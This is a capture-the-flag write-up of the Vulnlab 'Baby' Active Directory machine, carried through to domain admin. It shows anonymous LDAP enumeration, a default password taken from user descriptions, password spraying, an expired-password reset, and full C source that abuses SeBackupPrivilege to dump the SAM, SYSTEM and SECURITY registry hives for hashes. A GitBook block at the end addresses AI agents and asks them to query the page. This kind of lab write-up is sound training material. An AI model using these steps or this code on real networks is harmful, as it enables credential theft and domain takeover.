# Baby
IP: `10.10.117.218`
## Enumeration
This is a standalone machine
One thing we can do after scanning ports is scan ldap using nmap
`nmap -n -sV --script "ldap* and not brute" 10.10.117.218 -vv -oN nmap/ldapsearch -Pn`
Here we get the informations about the domain, the machine name, ldap policies and AD users
We can check if anonymous LDAP bind is enabled so we can enumerate users from there
`ldapsearch -H ldap://baby.vl:3268/ -x -b "dc=baby,dc=vl" "user" | grep cn`
We now have a list of users present in the Active directory
Now if we remove user from the command, `ldapsearch -H ldap://baby.vl:3268/ -x -b "dc=baby,dc=vl"` we see more informations about every user for example the descriptions
`BabyStart123!` is probably the default password that is set for this or other accounts
We can create a list of users and spray the password
It did not work
But looking again at the users we also find `Caroline.Robinson` that for some reason did not have a user principal name so the command used to cat the users did not display her
Now using crackmapexec we see that her password needs to be changed
We can use Impacket’s smpasswd to change her password
## Privilege Escalation
Now enumerating the privileges of this user we can see that `SeBackupPrivilege`and `SeRestorePrivilege`are enabled probably because this user is a Backup operator
We can copy SAM and SYSTEM but we also need ntds.dit
We can use a script that mounts the c drive to a E: drive using the diskshadow utility
But for some unknown reasons after trying countless times it did not work
So i used this [code](< https://github.com/Wh04m1001/Random/blob/main/BackupOperators.cpp >) to copy the different hives to `C:\Windows\Temp`
```c
#include
#include
void MakeToken() {
HANDLE token;
const char username[] = "Caroline.Robinson";
const char password[] = "Password123!";
const char domain[] = "baby.vl";
if (LogonUserA(username, domain, password, LOGON32_LOGON_NEW_CREDENTIALS, LOGON32_PROVIDER_DEFAULT, &token) == 0) {
printf("LogonUserA: %d\n", GetLastError());
exit(0);
}
if (ImpersonateLoggedOnUser(token) == 0) {
printf("ImpersonateLoggedOnUser: %d\n", GetLastError());
exit(0);
}
}
int main()
{
HKEY hklm;
HKEY hkey;
DWORD result;
const char* hives[] = { "SAM","SYSTEM","SECURITY" };
const char* files[] = { "C:\\windows\\temp\\sam.hive","C:\\windows\\temp\\system.hive","C:\\windows\\temp\\security.hive" };
//Uncomment if using alternate credentials.
MakeToken();
result = RegConnectRegistryA("\\\\baby.vl", HKEY_LOCAL_MACHINE, &hklm);
if (result != 0) {
printf("RegConnectRegistryW: %d\n", result);
exit(0);
}
for (int i = 0; i < 3; i++) {
printf("Dumping %s hive to %s\n", hives[i], files[i]);
result = RegOpenKeyExA(hklm, hives[i], REG_OPTION_BACKUP_RESTORE | REG_OPTION_OPEN_LINK, KEY_READ, &hkey);
if (result != 0) {
printf("RegOpenKeyExA: %d\n", result);
exit(0);
}
result = RegSaveKeyA(hkey, files[i], NULL);
if (result != 0) {
printf("RegSaveKeyA: %d\n", result);
exit(0);
}
}
}
```
Now we get the NT hash of the machine account `babydc$`
Then login with the Administrator account and we are DA
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://0xdeco.gitbook.io/vulnlab/baby.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.